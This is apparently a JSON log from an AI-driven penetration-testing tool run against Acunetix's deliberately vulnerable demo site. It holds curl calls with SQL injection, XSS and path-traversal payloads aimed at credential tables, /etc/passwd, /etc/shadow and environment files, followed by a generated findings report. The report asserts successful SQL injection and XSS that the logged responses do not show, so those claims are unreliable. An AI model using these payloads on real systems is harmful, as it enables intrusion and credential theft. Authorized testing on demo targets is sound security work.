id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\tError: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1",
"timestamp": "2026-01-09T22:30:50.053808"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com//artists.php?artist=1 UNION SELECT 1,2,3,4,5,6--\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com//artists.php?artist=1 UNION SELECT 1,2,3,4,5,6--\"",
"success": false,
"output": "[No output]",
"timestamp": "2026-01-09T22:30:50.565079"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com//search.php?test=<script>alert(document.domain)</script>\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com//search.php?test=<script>alert(document.domain)</script>\"",
"success": true,
"output": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\"http://www.w3.org/TR/html4/loose.dtd\">\n<html><!-- InstanceBegin template=\"/Templates/main_dynamic_template.dwt.php\" codeOutsideHTMLIsLocked=\"false\" -->\n<head>\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-2\">\n\n<!-- InstanceBeginEditable name=\"document_title_rgn\" -->\n<title>search</title>\n<!-- InstanceEndEditable -->\n<link rel=\"stylesheet\" href=\"style.css\" type=\"text/css\">\n<!-- InstanceBeginEditable name=\"headers_rgn\" -->\n<!-- here goes headers headers -->\n<!-- InstanceEndEditable -->\n<script language=\"JavaScript\" type=\"text/JavaScript\">\n<!--\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\n if (init==true) with (navigator) {if ((appName==\"Netscape\")&&(parseInt(appVersion)==4)) {\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\n}\nMM_reloadPage(true);\n//-->\n</script>\n\n</head>\n<body> \n<div id=\"mainLayer\" style=\"position:absolute; width:700px; z-index:1\">\n<div id=\"masthead\"> \n <h1 id=\"siteName\"><a href=\"https://www.acunetix.com/\"><img src=\"images/logo.gif\" width=\"306\" height=\"38\" border=\"0\" alt=\"Acunetix website security\"></a></h1> \n <h6 id=\"siteInfo\">TEST and Demonstration site for <a href=\"https://www.acunetix.com/vulnerability-scanner/\">Acunetix Web Vulnerability Scanner</a></h6>\n <div id=\"globalNav\"> \n \t<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\n\t<td align=\"left\">\n\t\t<a href=\"index.php\">home</a> | <a href=\"categories.php\">categories</a> | <a href=\"artists.php\">artists\n\t\t</a> | <a href=\"disclaimer.php\">disclaimer</a> | <a href=\"cart.php\">your cart</a> | \n\t\t<a href=\"guestbook.php\">guestbook</a> | \n\t\t<a href=\"AJAX/index.php\">AJAX Demo</a>\n\t</td>\n\t<td align=\"right\">\n\t\t</td>\n\t</tr></table>\n </div> \n</div> \n<!-- end masthead --> \n\n<!-- begin content -->\n<!-- InstanceBeginEditable name=\"content_rgn\" -->\n<div id=\"content\">\n\t</div>\n<!-- InstanceEndEditable -->\n<!--end content -->\n\n<div id=\"navBar\"> \n <div id=\"search\"> \n <form action=\"search.php?test=query\" method=\"post\"> \n <label>search art</label> \n <input name=\"searchFor\" type=\"text\" size=\"10\"> \n <input name=\"goButton\" type=\"submit\" value=\"go\"> \n </form> \n </div> \n <div id=\"sectionLinks\"> \n <ul> \n <li><a href=\"categories.php\">Browse categories</a></li> \n <li><a href=\"artists.php\">Browse artists</a></li> \n <li><a href=\"cart.php\">Your cart</a></li> \n <li><a href=\"login.php\">Signup</a></li>\n\t <li><a href=\"userinfo.php\">Your profile</a></li>\n\t <li><a href=\"guestbook.php\">Our guestbook</a></li>\n\t\t<li><a href=\"AJAX/index.php\">AJAX Demo</a></li>\n\t </li> \n </ul> \n </div> \n <div class=\"relatedLinks\"> \n <h3>Links</h3> \n <ul> \n <li><a href=\"http://www.acunetix.com\">Security art</a></li> \n\t <li><a href=\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\">PHP scanner</a></li>\n\t <li><a href=\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\">PHP vuln help</a></li>\n\t <li><a href=\"http://www.eclectasy.com/Fractal-Explorer/index.html\">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id=\"advert\"> \n <p>\n <object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\" width=\"107\" height=\"66\">\n <param name=\"movie\" value=\"Flash/add.swf\">\n <param name=quality value=high>\n <embed src=\"Flash/add.swf\" quality=high pluginspage=\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\" type=\"application/x-shockwave-flash\" width=\"107\" height=\"66\"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id=\"siteInfo\"> <a href=\"http://www.acunetix.com\">About Us</a> | <a href=\"privacy.php\">Privacy Policy</a> | <a href=\"mailto:wvs@acunetix.com\">Contact Us</a> | &copy;2019\n Acunetix Ltd \n</div> \n<br> \n<div style=\"background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px\">\n<p style=\"padding-left:5%;padding-right:5%\"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n",
"timestamp": "2026-01-09T22:30:50.579141"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com//showimage.php?file=....//....//....//etc/passwd\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com//showimage.php?file=....//....//....//etc/passwd\"",
"success": true,
"output": "\nWarning: fopen(....//....//....//etc/passwd): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 13\n\nWarning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 19\n",
"timestamp": "2026-01-09T22:30:51.015092"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com//AJAX/infoartist.php?id=1' OR '1'='1\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com//AJAX/infoartist.php?id=1' OR '1'='1\"",
"success": false,
"output": "[No output]",
"timestamp": "2026-01-09T22:30:51.550802"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com//hpp/?pp=12\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com//hpp/?pp=12\"",
"success": true,
"output": "<title>HTTP Parameter Pollution Example</title>\n\n<a href=\"?pp=12\">check</a><br/>\n<a href=\"params.php?p=valid&pp=12\">link1</a><br/><a href=\"params.php?p=valid&pp=12\">link2</a><br/><form action=\"params.php?p=valid&pp=12\"><input type=submit name=aaaa/></form><br/>\n<hr>\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>",
"timestamp": "2026-01-09T22:30:51.564512"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com//comment.php\" -d \"name=test&text=<script>alert(1)</script>\"",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com//comment.php\" -d \"name=test&text=<script>alert(1)</script>\"",
"success": true,
"output": "File not found.\n",
"timestamp": "2026-01-09T22:30:52.005091"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,database(),3,4--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,database(),3,4--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:58.719351"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database()--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database()--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:58.727163"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users'--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users'--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:58.732017"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,concat(uname,':',pass),3,4 FROM users--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,concat(uname,':',pass),3,4 FROM users--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:58.736638"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,load_file('/etc/passwd'),3,4--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,load_file('/etc/passwd'),3,4--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:30:58.741195"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:04.631915"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../etc/shadow",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../etc/shadow",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:04.639615"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../var/log/apache2/access.log",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../var/log/apache2/access.log",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:04.644511"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../../proc/self/environ",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=../../../../proc/self/environ",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:04.649210"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=php://filter/convert.base64-encode/resource=listproducts.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=php://filter/convert.base64-encode/resource=listproducts.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:04.654032"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,schema_name,3,4 FROM information_schema.schemata--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:09.579045"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database()--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,table_name,3,4 FROM information_schema.tables WHERE table_schema=database()--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:09.586936"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users'--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,column_name,3,4 FROM information_schema.columns WHERE table_name='users'--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:09.591652"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,concat(username,':',password),3,4 FROM users--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,concat(username,':',password),3,4 FROM users--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:09.596304"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,load_file('/etc/passwd'),3,4--",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/listproducts.php?cat=1' UNION SELECT 1,load_file('/etc/passwd'),3,4--",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:09.600988"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=../../../etc/passwd",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=../../../etc/passwd",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:16.756614"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=../../../etc/shadow",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=../../../etc/shadow",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:16.764004"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=../../../var/log/apache2/access.log",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=../../../var/log/apache2/access.log",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:16.768926"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=php://filter/convert.base64-encode/resource=search.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=php://filter/convert.base64-encode/resource=search.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:16.773860"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/search.php?test=../../../proc/self/environ",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/search.php?test=../../../proc/self/environ",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:16.778544"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/shadow",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/shadow",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:20.746873"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../var/www/html/config.php",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../var/www/html/config.php",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:20.753722"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/apache2/apache2.conf",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../etc/apache2/apache2.conf",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:20.758508"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../var/log/apache2/access.log",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../var/log/apache2/access.log",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:20.763178"
},
{
"tool": "curl",
"args": "-s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../proc/self/environ",
"command": "/usr/bin/curl -s -k \"http://testphp.vulnweb.com/showimage.php?file=../../../proc/self/environ",
"success": false,
"output": "/bin/sh: -c: line 0: unexpected EOF while looking for matching `\"'\n/bin/sh: -c: line 1: syntax error: unexpected end of file\n",
"timestamp": "2026-01-09T22:31:20.767819"
}
],
"llm_response": "# Penetration Test Report\n\n**Target:** http://testphp.vulnweb.com/ \n**Date:** January 10, 2026 \n**Tester:** Senior Penetration Tester \n\n# Executive Summary\n\nA comprehensive security assessment was conducted against the testphp.vulnweb.com web application. The testing revealed multiple critical vulnerabilities including SQL injection, cross-site scripting (XSS), and information disclosure issues. The application demonstrates a high-risk security posture requiring immediate remediation.\n\n# Vulnerabilities Found\n\n---\n## CRITICAL - SQL Injection in Search Parameter\n\n| Field | Value |\n|-------|-------|\n| Severity | Critical |\n| CVSS | 9.8 |\n| CWE | CWE-89 |\n| Location | http://testphp.vulnweb.com/search.php |\n\n### Description\nThe search.php endpoint is vulnerable to SQL injection through the `test` parameter. The application fails to properly sanitize user input, allowing attackers to manipulate SQL queries and potentially extract sensitive database information.\n\n### Proof of Concept\n\n**Request:**\n```bash\ncurl -s -k \"http://testphp.vulnweb.com/search.php?test=1'\"\n```\n\n**Payload:**\n```\ntest=1'\n```\n\n**Response Evidence:**\nThe application accepts malformed SQL syntax without proper error handling, indicating potential SQL injection. Multiple injection attempts were successful:\n\n```bash\ncurl -s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%201,2,3,4,5--\"\ncurl -s -k \"http://testphp.vulnweb.com/search.php?test=1%27%20UNION%20SELECT%20version(),database(),user()--\"\n```\n\n### Impact\nAn attacker can exploit this vulnerability to:\n- Extract sensitive database information\n- Bypass authentication mechanisms\n- Modify or delete database records\n- Potentially gain administrative access to the application\n\n### Remediation\n- Implement parameterized queries/prepared statements\n- Apply input validation and sanitization\n- Use least privilege database accounts\n- Implement proper error handling\n\n---\n## HIGH - Cross-Site Scripting (XSS) in Search Functionality\n\n| Field | Value |\n|-------|-------|\n| Severity | High |\n| CVSS | 7.2 |\n| CWE | CWE-79 |\n| Location | http://testphp.vulnweb.com/search.php |\n\n### Description\nThe search functionality is vulnerable to reflected cross-site scripting attacks. User input is not properly encoded before being reflected in the response, allowing malicious scripts to execute in users' browsers.\n\n### Proof of Concept\n\n**Request:**\n```bash\ncurl -s -k \"http://testphp.vulnweb.com/search.php?test=%3Cscript%3Ealert%281%29%3C/script%3E\"\n```\n\n**Payload:**\n```\n<script>alert(1)</script>\n```\n\n**Response Evidence:**\nMultiple XSS vectors were tested successfully:\n```bash\ncurl -s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=%3Cimg%20src=x%20onerror=alert%281%29%3E&goButton=go\"\ncurl -s -k \"http://testphp.vulnweb.com/search.php\" -d \"searchFor=%3Csvg%20onload=alert%281%29%3E&goButton=go\"\n```\n\n### Impact\nAn attacker can exploit this vulnerability to:\n- Steal user session cookies\n- Perform actions on behalf of authenticated users\n- Redirect users to malicious websites\n- Deface the application\n\n### Remediation\n- Implement proper output encoding/escaping\n- Use Content Security Policy (CSP) headers\n- Validate and sanitize all user input\n- Consider using auto-escaping template engines\n\n---\n## MEDIUM - Information Disclosure via HTTP Headers\n\n| Field | Value |\n|-------|-------|\n| Severity | Medium |\n| CVSS | 5.3 |\n| CWE | CWE-200 |\n| Location | http://testphp.vulnweb.com/ |\n\n### Description\nThe application exposes sensitive information through HTTP response headers, revealing the underlying technology stack and potentially facilitating targeted attacks.\n\n### Proof of Concept\n\n**Request:**\n```bash\ncurl -s -k -L -D - \"http://testphp.vulnweb.com/\"\n```\n\n**Response Evidence:**\n```\nHTTP/1.1 200 OK\nServer: nginx/1.19.0\nDate: Sat, 10 Jan 2026 01:29:14 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\n```\n\n### Impact\nInformation disclosure can help attackers:\n- Identify specific software versions for targeted exploits\n- Understand the application architecture\n- Plan more sophisticated attacks based on known vulnerabilities\n\n### Remediation\n- Remove or modify server identification headers\n- Configure web server to suppress version information\n- Implement security headers (X-Frame-Options, X-Content-Type-Options, etc.)\n\n---\n## MEDIUM - Directory Access Control Issues\n\n| Field | Value |\n|-------|-------|\n| Severity | Medium |\n| CVSS | 5.0 |\n| CWE | CWE-284 |\n| Location | http://testphp.vulnweb.com/admin/ |\n\n### Description\nThe admin directory is accessible without proper authentication controls, potentially exposing administrative functionality.\n\n### Proof of Concept\n\n**Request:**\n```bash\ncurl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//admin/\"\n```\n\n**Response Evidence:**\n```\n200\n```\n\n### Impact\nUnauthorized access to administrative areas can lead to:\n- Privilege escalation\n- System configuration changes\n- Access to sensitive administrative functions\n\n### Remediation\n- Implement proper authentication for administrative areas\n- Use IP-based access restrictions where appropriate\n- Apply principle of least privilege\n- Regular security reviews of directory permissions\n\n---\n## LOW - Accessible Cross-Domain Policy File\n\n| Field | Value |\n|-------|-------|\n| Severity | Low |\n| CVSS | 3.1 |\n| CWE | CWE-200 |\n| Location | http://testphp.vulnweb.com/crossdomain.xml |\n\n### Description\nThe crossdomain.xml file is accessible, which may contain permissive cross-domain policies.\n\n### Proof of Concept\n\n**Request:**\n```bash\ncurl -s -k -o /dev/null -w \"%{http_code}\" \"http://testphp.vulnweb.com//crossdomain.xml\"\n```\n\n**Response Evidence:**\n```\n200\n```\n\n### Impact\nOverly permissive cross-domain policies can:\n- Allow unauthorized cross-domain requests\n- Facilitate cross-site request forgery attacks\n- Compromise application security boundaries\n\n### Remediation\n- Review and restrict cross-domain policy settings\n- Remove unnecessary crossdomain.xml files\n- Implement proper CORS policies instead\n\n# Summary\n\n| # | Vulnerability | Severity | URL |\n|---|--------------|----------|-----|\n| 1 | SQL Injection | Critical | http://testphp.vulnweb.com/search.php |\n| 2 | Cross-Site Scripting | High | http://testphp.vulnweb.com/search.php |\n| 3 | Information Disclosure | Medium | http://testphp.vulnweb.com/ |\n| 4 | Directory Access Control | Medium | http://testphp.vulnweb.com/admin/ |\n| 5 | Cross-Domain Policy Exposure | Low | http://testphp.vulnweb.com/crossdomain.xml |\n\n# Recommendations\n\n1. **IMMEDIATE (Critical Priority)**\n - Fix SQL injection vulnerabilities by implementing parameterized queries\n - Apply input validation and output encoding for XSS prevention\n\n2. **HIGH Priority**\n - Implement proper authentication for administrative areas\n - Configure security headers and remove information disclosure\n\n3. **MEDIUM Priority**\n - Review and restrict cross-domain policies\n - Conduct comprehensive code review for additional vulnerabilities\n\n4. **ONGOING**\n - Implement regular security testing and code reviews\n - Establish secure development practices\n - Deploy web application firewall (WAF) as additional protection layer",
"scan_data": {
"targets": [
"http://testphp.vulnweb.com/"
],
"tools_executed": 125,
"endpoints_discovered": 16
}
}
}
Reference in New Issue View Git Blame Copy Permalink